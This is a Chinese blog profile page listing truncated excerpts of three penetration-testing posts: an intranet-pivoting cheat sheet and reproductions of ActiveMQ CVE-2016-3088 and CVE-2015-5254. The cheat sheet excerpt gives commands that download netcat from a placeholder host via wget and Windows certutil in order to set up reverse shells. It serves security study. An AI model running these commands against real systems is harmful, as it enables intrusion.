- 博客(3)
- 收藏
- 关注
RSS订阅原创 内网渗透一条龙简洁版
内网渗透一条龙简洁版反弹shell工具准备搭建http服务python快速在当前目录搭建http服务python -m SimpleHTTPServer 8000Linux下载命令:wget http://fuck/ncLinux解压缩命令:#解压tar -zxvf FileName.tar.gz#压缩tar -zcvf FileName.tar.gz DirNameWindow下载命令certutil -urlcache -split -f http://fuck/nc.
2020-12-12 23:01:14
359
原创 ActiveMQ 任意文件写入漏洞(CVE-2016-3088)复现
ActiveMQ 任意文件写入漏洞(CVE-2016-3088)复现导语ActiveMQ的web控制台分三个应用:admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口。admin和api都需要登录后才能使用,fileserver无需登录。fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺
2020-12-12 02:07:10
2647
1
原创 ActiveMQ反序列化漏洞(CVE-2015-5254)复现
ActiveMQ反序列化漏洞(CVE-2015-5254)复现导语Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。漏洞环境git
2020-12-10 03:04:55
307
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人